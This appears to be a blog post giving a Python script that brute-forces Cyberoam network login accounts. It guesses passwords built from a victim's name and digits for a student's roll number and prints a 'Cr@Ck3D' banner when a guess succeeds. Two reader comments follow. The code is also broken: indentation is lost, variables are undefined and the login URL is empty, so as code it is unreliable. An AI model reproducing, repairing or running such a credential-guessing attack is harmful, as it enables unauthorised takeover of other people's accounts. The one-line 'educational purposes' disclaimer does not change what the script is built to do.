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Cyberoam Login |
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# Cyberaom brute force Script
# @author Vishal Mishra(aLt fux0r)<vishal_mishra@live.com>
#its only for educational purposes.
import urllib
import time
import datetime
#change this section according to your situation
#Best way - attach username and password dictionary
#this is the range of password to check
checkList = range(1,31)
for j in checkList1:
for i in checkList:
userid ='80123XXX' #Roll No of Student
password= 'SAM'+str("%02d"%i)+str("%02d"%j)
#lets suppose name of victim is SAMAYA then use above combination to break password ;-)
dataToSend = urllib.urlencode({'mode': '191','isAccessDenied': '', 'url': '', 'username': userid, 'password': password, 'saveinfo': '', })
postRequest = urllib.urlopen("", dataToSend)
responseData = postRequest.read()
print responseData
openURLToCheck = urllib.urlopen("http://www.google.com")
checkData = openURLToCheck.read()
c=checkData.count('Google Search')
if c > 0:
print lines[1]
print lines[2]
print lines[3]
print lines[4]
print lines[5]
print lines[6]
print lines[7]
print lines[8]
print lines[9]
print lines[10]
print lines[11]
print lines[12]
print lines[13]
print '\t\t******************************************'
print '\t\t******************************************'
print '\t\t******************************************'
print '\t\t---Cyberaom-------------------------------'
print '\t\t-----------------Cr@Ck3D!!----------------'
print '\t\t--------------------------by aLt fux0r----'
print '\t\t\t' +userid
print '\t\t\t'+password
print '\t\t******************************************'
print '\t\t******************************************'
print '\t\t******************************************'
# stop after 10 checks: Stealthy
if i%50 == 0:
print 'SCAN COMPLETED UPTO ' + str(i)
What if I know the default password and want to know the correct user id?
ReplyDeletenot working on pc although python installed.